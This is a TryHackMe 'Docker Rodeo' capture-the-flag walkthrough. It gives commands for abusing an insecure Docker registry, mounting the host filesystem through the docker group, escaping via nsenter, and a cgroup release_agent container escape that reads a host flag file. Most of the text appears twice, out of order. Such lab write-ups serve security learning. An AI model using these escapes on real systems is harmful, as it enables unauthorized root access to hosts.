TryHackMe - Docker Rodeo - Walkthrough
Introduction
Today we're going to be doing a walkthrough for the Docker Rodeo room hosted at https://tryhackme.com/room/dockerrodeo . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox as our attacking machine, and the deployed vulnerable Docker client as the the victim machine.
Task 1 - 1. Preface: Setting up Docker for this Room (Deploy #1)
Setup Walkthrough
1.2 Add Instance IP address to /etc/hosts
1.3 Tell Docker to Trust your Instance
echo $'{\n “insecure-registries” : ["docker-rodeo.thm:5000","docker-rodeo.thm:7000"]\n}' > /etc/docker/daemon.json
1.4 Restart Docker
While working through the room, we found that Docker would not start after it was stopped in the way the room wants you to. In this case, we restart the system to force a restart of the Docker service.
shutdown -r now
Questions:
Let's go
No answer needed
What is the name of the tag that has been published?
In Postman:
http://docker-rodeo.thm:7000/v2/securesolutions/webserver/tags/list
What is the Username in the database configuration?
What is the Password in the database configuration?
In Postman:
http://docker-rodeo.thm:7000/v2/securesolutions/webserver/manifests/production
Task 6 - 4. Vulnerability #2: Reverse Engineering Docker Images
Questions
What is the "IMAGE_ID" for the "challenge" Docker image that you just downloaded?
wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb
apt install ./dive_0.9.2_linux_amd64.deb
docker pull docker-rodeo.thm:5000/dive/example
docker images
Using Dive, how many "Layers" are there in this image?
dive <answer from previous question>
What user is successfully added?
In Dive:
Navigate to Layer 4 (counting from 0)
Task 7 - 5. Vulnerability #3: Uploading Malicious Docker Images
Questions
I've learnt that we can publish images with malicious code such as reverse shells to our vulnerable Docker registry.
No answer needed
Task 8 - 6. Vulnerability #4: RCE via Exposed Docker Daemon
Questions
I've executed some Docker commands remotely on the vulnerable Instance
No answer needed
Task 9 - 7. Vulnerability #5: Escape via Exposed Docker Daemon
Questions
Escape Successful
No answer needed
(unofficial)
ssh danny@10.10.232.225 -p 2233
password: danny
groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami
groups
Task 10 - 8. Vulnerability #6: Shared Namespaces
Questions
Attempt the exploit, you will know you are successful if you can ls /home/cmnatic
No answer needed
(unofficial)
ssh root@10.10.232.225 -p 2244
password: danny
nsenter --target 1 --mount sh
hostnamectl
Task 11 - 9. Vulnerability #7: Misconfigured Privileges (Deploy #2)
Questions
Contents of "flag.txt" from the host operating system
ssh root@10.10.8.193 -p 2244
password: danny
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /flag.txt
Task 12 - 10. Securing Your Container
Questions
I've secured my containers
No answer needed
Task 13 - 11. Bonus: Determining if we're in a container
Questions
Confirming suspicions...
No answer needed
Task 14 - 12. Additional Material
Questions
Finish
Today we're going to be doing a walkthrough for the Docker Rodeo room hosted at https://tryhackme.com/room/dockerrodeo . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox as our attacking machine, and the deployed vulnerable Docker client as the the victim machine.
Task 1 - 1. Preface: Setting up Docker for this Room (Deploy #1)
Setup Walkthrough
1.2 Add Instance IP address to /etc/hosts
echo “10.10.2.35 docker-rodeo.thm” >> /etc/hosts
1.3 Tell Docker to Trust your Instance
echo $'{\n “insecure-registries” : ["docker-rodeo.thm:5000","docker-rodeo.thm:7000"]\n}' > /etc/docker/daemon.json
1.4 Restart Docker
While working through the room, we found that Docker would not start after it was stopped in the way the room wants you to. In this case, we restart the system to force a restart of the Docker service.
shutdown -r now
Questions:
Let's go
No answer needed
Task 2 - 2. Introduction to Docker
Questions
Does Docker run on a Hypervisor? (Yay/Nay)
Answer contained with Task description
Task 3 - 3. Vulnerability #1: Abusing a Docker Registry
Questions
This task is a divider, please proceed onto the next task.
No answer needed
Task 4 - 3.1. What is a Docker Registry?
Questions
I've learnt about Docker registries
No answer needed
Task 5 - 3.2. Interacting with a Docker Registry
Questions
What is the name of the repository within this registry?
In Postman:
http://docker-rodeo.thm:7000/v2/_catalog
Questions
Does Docker run on a Hypervisor? (Yay/Nay)
Answer contained with Task description
Task 3 - 3. Vulnerability #1: Abusing a Docker Registry
Questions
This task is a divider, please proceed onto the next task.
No answer needed
Task 4 - 3.1. What is a Docker Registry?
Questions
I've learnt about Docker registries
No answer needed
Task 5 - 3.2. Interacting with a Docker Registry
Questions
What is the name of the repository within this registry?
In Postman:
http://docker-rodeo.thm:7000/v2/_catalog
What is the name of the tag that has been published?
In Postman:
http://docker-rodeo.thm:7000/v2/securesolutions/webserver/tags/list
What is the Username in the database configuration?
What is the Password in the database configuration?
In Postman:
http://docker-rodeo.thm:7000/v2/securesolutions/webserver/manifests/production
Task 6 - 4. Vulnerability #2: Reverse Engineering Docker Images
Questions
What is the "IMAGE_ID" for the "challenge" Docker image that you just downloaded?
wget https://github.com/wagoodman/dive/releases/download/v0.9.2/dive_0.9.2_linux_amd64.deb
apt install ./dive_0.9.2_linux_amd64.deb
docker pull docker-rodeo.thm:5000/dive/example
docker images
Using Dive, how many "Layers" are there in this image?
dive <answer from previous question>
What user is successfully added?
In Dive:
Navigate to Layer 4 (counting from 0)
Task 7 - 5. Vulnerability #3: Uploading Malicious Docker Images
Questions
I've learnt that we can publish images with malicious code such as reverse shells to our vulnerable Docker registry.
No answer needed
Task 8 - 6. Vulnerability #4: RCE via Exposed Docker Daemon
Questions
I've executed some Docker commands remotely on the vulnerable Instance
No answer needed
Task 9 - 7. Vulnerability #5: Escape via Exposed Docker Daemon
Questions
Escape Successful
No answer needed
(unofficial)
ssh danny@10.10.232.225 -p 2233
password: danny
groups
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
whoami
groups
Task 10 - 8. Vulnerability #6: Shared Namespaces
Questions
Attempt the exploit, you will know you are successful if you can ls /home/cmnatic
No answer needed
(unofficial)
ssh root@10.10.232.225 -p 2244
password: danny
nsenter --target 1 --mount sh
hostnamectl
Task 11 - 9. Vulnerability #7: Misconfigured Privileges (Deploy #2)
Questions
Contents of "flag.txt" from the host operating system
ssh root@10.10.8.193 -p 2244
password: danny
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/exploit" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /exploit
echo "cat /home/cmnatic/flag.txt > $host_path/flag.txt" >> /exploit
chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
cat /flag.txt
Task 12 - 10. Securing Your Container
Questions
I've secured my containers
No answer needed
Task 13 - 11. Bonus: Determining if we're in a container
Questions
Confirming suspicions...
No answer needed
Task 14 - 12. Additional Material
Questions
Finished!
No answer needed
Finish
Comments
Post a Comment